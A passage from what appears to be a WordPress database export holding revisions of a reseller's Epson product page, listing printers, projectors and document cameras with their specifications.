width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" />\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in eco-mode</li>\n 	<li>MHL-enabled</li>\n 	<li>Multi-PC Projection</li>\n 	<li>Horizontal Keystone Slider</li>\n 	<li>Miracast<sup>Â®</sup></li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-L500WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /><br>\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\n<ul>\n 	<li>5,000 lumens colour/white brightness<sup>Â </sup></li>\n 	<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li>\n 	<li>Laser light source of up to 20,000 hours</li>\n 	<li>Virtually maintenance-free for optical engine life</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>ACCENT LIGHTING LASER PROJECTORS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson LightScene EV-105</strong><br /><br /></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>ULTRA PORTABLE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-1785WÂ </strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"238\" height=\"177\" />\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\n<ul>\n 	<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li>\n 	<li>WXGA Resolution</li>\n 	<li>Real-Time Auto Keystone Correction</li>\n 	<li>Split Screen Projection</li>\n 	<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INTERACTIVE</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-536WiÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></h4>\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\n<ul>\n 	<li>WXGA Resolution</li>\n 	<li>White and Colour Brightness at 3,300lm</li>\n 	<li>Multi-PC projection</li>\n 	<li>HDMI Connectivity x2</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>HIGH BRIGHTNESS</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-L1405UNLÂ </strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /><br>\nThe Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.\n<ul>\n 	<li>White and Colour Brightness at 8,000lm</li>\n 	<li>WUXGA (1920 x 1200)</li>\n 	<li>Edge-blending to create large panoramic images</li>\n 	<li>Curve and corner wall projection</li>\n 	<li>HDBaseT</li>\n</ul>\n[maxbutton id=\"12\" ]<h4><strong>Epson EB-G7400UNLÂ </strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /><br>\nEpson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.\n<em>* With optional ELPLX01 zero offset ultra-short throw lens.</em>\n<ul>\n 	<li>High Brightness</li>\n 	<li>Beyond Full HD Resolution</li>\n 	<li>Powered Lens</li>\n 	<li>Portrait Projection</li>\n 	<li>Flexible Installation</li>\n 	<li>Edge Blending</li>\n 	<li>Point Correction</li>\n</ul>\n[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson EB-Z10000UÂ </strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /><br>\nDiscover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.\n<ul>\n 	<li>White and Colour Brightness at 10,000Â lm</li>\n 	<li>WUXGA resolution</li>\n 	<li>High Reliability and Durability</li>\n 	<li>Suitable for 24/7 usage</li>\n 	<li>Flexible projection angles and installations</li>\n</ul>\n[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 10:58:29','2019-09-26 02:58:29','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3499,1,'2019-09-26 11:07:00','2019-09-26 03:07:00','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><p><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><p><br />The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h2>Projectors for Work</h2>		\n			<h2>CORPORATE AND EDUCATIONÂ </h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EB-2055</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson EB-2142W</strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" />\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\n<ul>\n 	<li>White and Colour Brightness at 4,200lm</li>\n 	<li>WXGA Resolution</li>\n 	<li>12000 hours lamp life in 